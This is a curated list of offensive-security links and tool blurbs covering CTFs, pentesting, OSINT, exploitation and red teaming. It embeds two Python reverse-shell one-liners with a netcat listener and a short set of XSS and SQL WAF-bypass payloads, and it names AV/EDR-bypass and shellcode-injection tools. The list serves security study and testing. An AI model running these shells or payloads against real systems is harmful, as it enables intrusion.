- bad_json_parsers: Exposing problems in json parsers of several programming languages.
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges by eleemosynator
- pwntools: CTF framework and exploit development library
- google-ctf
- Pwn2Win 2018. unsolved
- Leap Security
- 35c3ctf-challs
- ctf-tasks: An archive of low-level CTF challenges developed over the years.
- $50 million CTF Writeup.
- Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
- RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
- BalsnCTF-2019 by CykuTW
- HackTheBox CTF Cheatsheet: This cheasheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty.
- Mumbai:1 Vulnhub Walkthrough
- 0x0G 2020 CTF
- FIRST SecLounge CTF 2020 Solutions
- Hitcon2017CTF - 家徒四壁
Everlasting Imaginative Void - r2dec
- SASatHome
- CTFs-Exploits
- nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
- thg-framework
- Super-Guesser-ctf
- Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- ARM LAB ENVIRONMENT
- Azure IoT HUB
- A collection of vulnerable ARM binaries for practicing exploit development
- arm vm working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> rosenbridge: Hardware backdoors in some x86 CPUs
- USBHarpoon Is a BadUSB Attack with A Twist
- Ground Zero: Part 3-2 Patching Binaries with Radare2 - ARM64
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida: RISC-V ISA processor module for IDAPro 7.x
- mac-age: MAC address age tracking
- OpenWRT em Mikrotik Routerboard 750
- Lexra: Lexra did implement a 32-bit variant of the MIPS architecture.
- IntelTEX-PoC: Intel Management Engine JTAG Proof of Concept
- me_cleaner: Tool for partial deblobbing of Intel ME/TXE firmware images.
- Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
- me_removal: Testing complete ME removal on Intel HEDT systems
- IDA-scripts: IDAPro scripts/plugins
- Something about IR optimization: Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
- Dragonblood: Analysing WPA3's Dragonfly Handshake
- The Hacker's Hardware Toolkit: The best hacker's gadgets for Red Team pentesters and security researchers.
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks: A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
- Rewriting Functions in Compiled Binaries
- eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- Deep Dive: Machine Check Error Avoidance on Page Size Change.
- Saleae: Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits. downloads
- wacker: A WPA3 dictionary cracker.
- Wifi-Ducky-ESPUSB
- USB Attacks: Past, Present and Future, P4wnP1 Covert Channel demo - P4wnP1 is below on pentesting section. wrap-up here
- PLATYPUS: With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I
- Arm Heap Exploitation, by Azeria:
- AZM Online Arm Assembler
- Part 1: Understanding the Glibc Heap Implementation
- Part 2: Understanding the GLIBC Heap Implementation
- Heap Exploit Development– Case study from an in-the-wild iOS 0-day. thread
- ARM64 Reversing and Exploitation by prateekg147:
- Part 1 - ARM Instruction Set + Simple Heap Overflow
- Part 2 - Use After Free
- Part 3 - A Simple ROP Chain
- Seclists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
- Search operating systems on the network: osquery
- osquery Across the Enterprise
- fleet: The premier osquery fleet manager.
- Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection
- Zero Day Zen Garden:
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- Script to steal passwords from ssh.
- Network Infrastructure Penetration Testing Tool
- tcp connection hijacker
- "EAST" PENTEST FRAMEWORK
- Pown.js: is the security testing an exploitation framework built on top of Node.js and NPM.
- Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine.
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- TIDoS-Framework: The offensive web application penetration testing framework.
- GitMiner: Tool for advanced mining for content on Github
- DHCPwn: All your IPs are belong to us.
- badKarma: advanced network reconnaissance toolkit.
- Danger-zone: Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
- go-tomcat-mgmt-scanner: A simple scanner to find and brute force tomcat manager logins
- IoTSecurity101: From IoT Pentesting to IoT Security
- IoT Pentesting and IoT-PT: A Virtual environment for Pentesting IoT Devices
- red_team_telemetry
- SharpSploitConsole: SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
- CrackMapExec: A swiss army knife for pentesting networks
- DarkSpiritz: A penetration testing framework for Linux, MacOS, and Windows systems.
- proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
- PentestHardware: Kinda useful notes collated together publicly
- MarkBaggett’s gists: This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
- Serverless Toolkit for Pentesters
- pentest_scripts: scrapes linkedin and generates emails list.
- Penetration Testing Tools Cheat Sheet ∞: Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test.
- shellver: Reverse Shell Cheat Sheet TooL
- IVRE: Network recon framework (github).
- (pt-br) DomainInformation: Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
- GTRS: GTRS - Google Translator Reverse Shell
- Spawning a TTY Shell: Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system.
- LeakLooker: Find Open Databases in Seconds. github
- pown-recon: A powerful target reconnaissance framework powered by graph theory.
- Micro8: The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
- Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
- Penetration Test Guide based on the OWASP + Extra: This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
- Insecure Direct Object References (OTG-AUTHZ-004)
- OWASP ZAP w2019-10-14 released: pentesting tool for finding vulnerabilities in web applications.
- Order of the Overflow Proxy Service
- liffy: Local file inclusion exploitation tool
- foxyproxy.json: Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
- pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
- Linux for Pentester: ZIP Privilege Escalation
- Presentation Clickers: Keystroke injection vulnerabilities in wireless presentation clickers.
- postwoman: alien API request builder - A free, fast, and beautiful alternative to Postman.
- Better API Penetration Testing with Postman:
- DNS and DHCP Recon using Powershell
- SiteBroker: A cross-platform python based utility for information gathering and penetration testing automation!
- PENTESTING-BIBLE: This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.
- Nikto web server scanner.
- NetAss2: Network Assessment Assistance Framework.
- CSS Injection Primitives
- physical-docs: This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments.
- pentest-tools: Custom pentesting tools.
- HACKING WITH ENVIRONMENT VARIABLES: Interesting environment variables to supply to scripting language interpreters
- rootend: A *nix Enumerator & Auto Privilege Escalation tool.
- DroneSploit: Drone pentesting framework console.
- HAck Tricks(Pentesting Methodology): Here you will find the typical flow that you should follow when pentesting one or more machines.
- Huawei_Thief: Huawei DG8045 & HG633 Devices Exploitation Tool
- urldozer: Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]).
- Pentesting Cheatsheets
- Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
- Several ways to download and execute malicious codes (LOLBAS)
- Jok3r: Network and Web Pentest Automation Framework. site
- Penetration Testing Cheat Sheet
- BBT- Bug Bounty Tools
- P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
- AriaCloud: A Docker container for remote penetration testing.
- RustScan: The Modern Day Port Scanner.
- Impacket: is a collection of Python classes for working with network protocols.
- fiddler: Capturing web traffic logs
- SecLists: is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
- 21 - Pentesting FTP
- PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. The notes section of the pentesters mind.
- post-exploitation: Post Exploitation Collection.
- Proxyjump, the SSH option you probably never heard of
- GLORP: A CLI-based HTTP intercept and replay proxy
- Sec4US's cheatsheets: a lot of cheatsheets about shellcoding and bufferoverflow.
- Pentesting 101: Working With Exploits
- SMB AutoRelay: SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.
- Decoder++: An extensible application for penetration testers and software developers to decode/encode data into various formats.
- SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command.
- bulwark: An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
- Automated Reconnaissance Pipeline: An automated target reconnaissance pipeline.
- PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
- subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- urlhunter: a recon tool that allows searching on URLs that are exposed via shortener services
- linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
- Ethical Hacking Course: Enumeration Theory
- Sublist3r: Fast subdomains enumeration tool for penetration testers
- subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
- massh-enum: OpenSSH 7.x Mass Username Enumeration.
- LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
- linpostexp: Linux post exploitation enumeration and exploit checking tools
- Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
- The art of subdomain enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration".
- social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
- LEGION - Automatic Enumeration Tool
- discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- Z/OS System Enumeration Scripts: PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
- WPExploitation: simples scripts to help windows enumeration.
- CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
- feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
- grinder: Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
- Admin-Scanner: This tool is to design to find admin panel of websites.
- the-art-of-subdomain-enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration"
- Virtual host scanner: A script to enumerate virtual hosts on a server.
- vhost-brute: A PHP tool to brute force vhost configured on a server.
- grab_beacon_config: nmap strip to get beacon info.
- assetfinder: Find domains and subdomains related to a given domain.
- Wordlists:
- hackerone_wordlist: The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
- paths wordlists
- subdomains wordlists
- parameters wordlists
- Assetnote Wordlists
- novahot:A webshell framework for penetration testers.
- Weevely: Weaponized web shell
- Did you know that Python's simple web server can run CGI scripts
- Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM.
- shellcode2asmjs: Automatically generate ASM.JS JIT-Spray payloads
- Shellen:Interactive shellcoding environment to easily craft shellcodes
- C-S1lentProcess1njector: Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage.
- Windows:
- Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
- pe_to_shellcode: Converts PE into a shellcode
- stager.dll: Code from this article
- ThreadBoat: Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
- Excel4-DCOM: PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
- MaliciousMacroMSBuild: Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
- Linux:
- Linux x86 Reverse Shell Shellcode
- mem-loader.asm: Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by x-c3ll
- Shellab: Linux and Windows shellcode enrichment utility
- ShellcodeWrapper: Shellcode wrapper with encryption for multiple target languages
- I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch): nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking import("subprocess").Popen("sh",0,None,*[ import("socket").create_connection(("127.0.0.1",1234))]3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,[ socket.create_connection(("127.0.0.1",1234))]*3)"
- python-pty-shells: Python PTY backdoors - full PTY or nothing!
- Powershell HTTP/S Reverse Shell: Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware.
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Reverse Shell Cheat Sheet
- Reverse Shell Generator repo
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- (pt-br) Usando a pwntools para Binary Exploitation
- CallObfuscator: Obfuscate specific windows apis with different apis
- public-pentesting-reports. Curated list of public penetration test reports released by several consulting firms and academic security groups
- report-ng: Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- PandocPentestReport: This repository shows my effort to create a pandoc based pentest report template.
- Technical Report template: LaTeX template for technical reports
- TryHackMe. Breaking Into the Kenobi Machine.
- PwnDoc: PwnDoc is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report.
- Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
- OSINT tool for visualizing relationships between domains, IPs and email addresses.
- sn0int: Semi-automatic OSINT framework and package manager
- A Pentester’s Guide – Part 1: OSINT – Passive Recon and Discovery of Assets
- A Pentester’s Guide - Part 2: OSINT – LinkedIn is Not Just for Jobs
- iKy: I Know You (OSINT project)
- Gitrob: Putting the Open Source in OSINT
- OSint Tools: On this page you’ll find tools which you can help do your OSINT reseach.
- datasploit: An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
- the-endorser: An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
- OSINT-y Goodness: HathiTrust Digital Library
- OSINT Resources for 2019
- Awesome OSINT: 😱 A curated list of amazingly awesome OSINT
- OSINT-y Goodness, №14 - Directory of Open Access Journals
- Twitter Analysis: Identifying A Pro-Indonesian Propaganda Bot Network
- TWINT: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.
- Breaking Mimblewimble’s Privacy Model: Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% Grin transactions in real time.
- snscrape: A social networking service scraper in Python
- Hack the planet with ꓘamerka GUI — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. twitter announcement, github. ICS/IoT search: ꓘamerka. Kamerka OSINT tool shows your country's internet-connected critical infrastructure
- dmi-tcat/Digital Methods Initiative - Twitter Capture and Analysis Toolset.
- KnockKnock: A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes.
- From email to phone number, a new OSINT approach
- recox: Master script for web reconnaissance
- openSquat is an opensource Intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams.
- Trace Labs Kali Linux build configuration: Trace Labs OSINT Linux Distribution based on Kali.
- natlas: Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned.
- sifter: is a osint, recon & vulnerability scanner. It combines a plethara of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsft and if unpatched, exploit them.
- Kitsune: An artificial neural network to detect automated Twitter accounts (bots).
- OSINT framework focused on gathering information from free tools or resources.
- h8mail: Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
- PwnBin: Python Pastebin Webcrawler that returns list of public pastebins containing keywords
- ODBParser: OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.
- pastego: Scrape/Parse Pastebin using GO and expression grammar (PEG)
- chatter: internet monitoring osint telegram bot for windows
- Slackhound: Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
- Striker is an offensive information and vulnerability scanner
- SQL Vulnerability Scanner
- Decentralized Application Security Project, github
- BLEAH: A BLE scanner for "smart" devices hacking.
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- Beating the OWASP Benchmark
- CMSScan: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
- Meteor Blind NoSQL Injection
- Security Bulletins that relate to Netflix Open Source
- tsunami-security-scanner: Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
- Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners, repo
- New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service. NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website
- openVulnQuery: A Python-based client for the Cisco openVuln API
- Web Application Penetration Testing Course URLs
- Web Application Penetration Testing Notes
- quarantyne: Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
- Sitadel: Web Application Security Scanner.
- WAF through the eyes of hackers
- Some nice payloads to bypass XSS WAF:
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
- bypassing moderning web application firewalls
- WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
- Bypassing Cloudflare WAF with the origin server IP address
- IOSurface exploit
- Attacking a co-hosted VM: A hacker, a hammer and two memory modules
- How To Create a Metasploit Module
- Installing Metasploit Pro, Ultimate, Express, and Community
- unfurl, An Entropy-Based Link Vulnerability Analysis Tool
- A collection of vulnerable ARM binaries for practicing exploit development
- A collection of PHP exploit scripts
- Sage ACF Blocks: A Sage 10 helper package for building ACF blocks rendered using blade templates.
- WebKit exploit
- Modern Binary Exploitation - Spring 2015
- (video) Python 2 vs 3 for Binary Exploitation Scripts
- DriveCrypt: DriveCrypt Dcr.sys vulnerability exploit
- Faxploit: Sending Fax Back to the Dark Ages
- beebug: A tool for checking exploitability
- NAVEX: Precise and scalable exploit generation for dynamic web applications
- Three New DDE Obfuscation Methods
- SILENTTRINITY: A post-exploitation agent powered by Python, IronPython, C#/.NET
- fuxploider: File upload vulnerability scanner and exploitation tool.
- Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff.
- Attacking Google Authenticator
- Pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. installation guide, starting guide
- Glibc Heap Exploitation Basics:
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- movfuscator: The single instruction C compiler
- beebug: A tool for checking exploitability
- UEFI vulnerabilities classification focused on BIOS implant delivery and What makes OS drivers dangerous for BIOS?
- MikroTik Firewall & NAT Bypass
- 3D Accelerated Exploitation: The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- GhostDelivery: Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
- Beat the hole in the ATM: hacking an diebold ATM.
- RedGhost: Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
- PowerSploit: is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃: python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- The Art of WebKit Exploitation
- PEASS: Privilege Escalation Awesome Scripts SUITE.
- Patchless AMSI bypass using SharpBlock
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- SharpBlock: A method of bypassing EDR's active projection DLL's by preventing entry point exection. SylantStrike: Simple EDR implementation to demonstrate bypass.
- Bypassing Antivirus with Golang – Gopher it!
- The Invoke-CradleCrafter Overview
- DVS: D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects.
- The Exploit Database Git Repository
- Vulnerability Lab: helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them.
- 0day.Today: Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites.
- cxsecurity: is an open project developed and moderated fully by one independent person.
- Security Focus
- packet storm: Exploit Files
- Graphology of an Exploit: Hunting for exploits by looking for the author’s fingerprints
- Traditional Buffer Overflow Windows cheatsheet
- Exploit writing tutorial part 3 : SEH Based Exploits
- Vulnerability DB: Detailed information and remediation guidance for known vulnerabilities.
- mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse.
- bbrecon Python library and CLI for the Bug Bounty Recon API
- RPC Bug Hunting Case Studies – Part 1
- Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
- Our top tips for better bug bounty reports, plus a hacker contest!
- axiom: The dynamic infrastructure framework for anybody!
- gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- get-title
- Insecure Direct Object References
- bugbounty-cheatsheet: A list of interesting payloads, tips and tricks for bug bounty hunters.
- Awesome Bug Bounty: A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
- ParamSpider: Mining parameters from dark corners of Web Archives.
- SQLi
- Server Side Request Forgery
- CRLF
- CRLF Injection
- CSV-Injection
- CSV Injection
- Command Injection
- Directory Traversal
- LFI
- File Inclusion
- Open-Redirect
- RCE
- Crypto
- Template Injection
- SSTI
- XSLT
- Content Injection
- LDAP Injection
- NoSQL Injection
- GraphQL Injection
- IDOR
- ISCM
- OAuth
- XPATH Injection
- Bypass Upload Tricky
- CSRF:
- HTTP Request Smuggling:
- Practical Attacks Using HTTP Request Smuggling slides
- HAProxy HTTP request smuggling (CVE-2019-18277)
- The Powerful HTTP Request Smuggling
- Smuggler: An HTTP Request Smuggling / Desync testing tool written in Python 3
- XSS:
- SSRF:
- SSRF
- SSRF Tips: some tips with Server Side Request Forgery.
- Server Side Request Forgery on MISP: CVE-2020-28043
- SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
- Unauthenticated Full-Read SSRF in Grafana: CVE-2020-13379
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Gf-Patterns: GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
- XXE:
- Out of Band XXE in an E-commerce IOS app
- Comprehensive Guide on XXE Injection
- XMLDecoder payload generator: A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec.
- Enjoying my first blind xxe experience
- XXE
- dtd-finder: List DTDs and generate XXE payloads using those local DTDs.
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Serialization:
- ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- SerialVersionUID in Java
- Java Serialization Magic Methods And Their Uses With Example
- Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484), Tomcat code: java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- CVE-2020-9484-Mass-Scan
- Exploiting JNDI Injections in Java
- How to exploit Liferay CVE-2020-7961 : quick journey to PoC
- How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
- Serialization: the big threat
- marshalsec: Turning your data into code execution
- SerializationDumper: A tool to dump Java serialization streams in a more human readable form.
- owaspsd-deserialize-my-shorts: Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
- Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
- GraphQL: Common vulnerabilities & how to exploit them. apis guru for graphql:  Represent any GraphQL API as an interactive graph.
- CSM_Pocs: Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices.
- DSSS, Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
- Garud: An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
- httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
- waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain
- Easily Identify Malicious Servers on the Internet with JARM
- REST Assured: Penetration Testing REST APIs Using Burp Suite:
- Awesome Burp Extensions: A curated list of amazingly awesome Burp Extensions
- BurpSuiteHTTPSmuggler: A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
- AutoRepeater: Automated HTTP Request Repeating With Burp Suite
- privatecollaborator: A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
- Deploying a private Burp Collaborator server
- Burp Collaborator Server docker container with LetsEncrypt certificate: This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server.
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT: The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data.
- AES-Killer v3.0: Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
- Femida-xss: Automated blind-xss search for Burp Suite
- dotNetBeautifier: A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
- Java-Deserialization-Scanner: All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
- JavaSerialKiller: Burp extension to perform Java Deserialization Attacks.
- BurpBounty: Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
- BurpExtension-WhatsApp-Decryption-CheckPoint
- InQL Scanner: A Burp Extension for GraphQL Security Testing.
- PII-Identifier: Burp Extension to identify PII data
- 403Bypasser: Burpsuite Extension to bypass 403 restricted directory
- Awesome Red Teaming
- DumpsterFire: "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
- Machine Learning for Red Teams, Part 1
- Flying under the radar: Hack into a „highly protected“ company without getting caught
- demiguise: HTA encryption tool for RedTeams
- Sn1per: Automated pentest framework for offensive security experts
- jenkins-shell: Automating Jenkins Hacking using Shodan API
- Red Team's SIEM: easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- The-Hacker-Playbook-3-Translation: 对 The Hacker Playbook 3 的翻译。
- How Do I Prepare to Join a Red Team?
- Red Team & Physical Entry Gear
- Red Team Techniques: Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap): an ‘invisible’ network tap aimed at red teams.
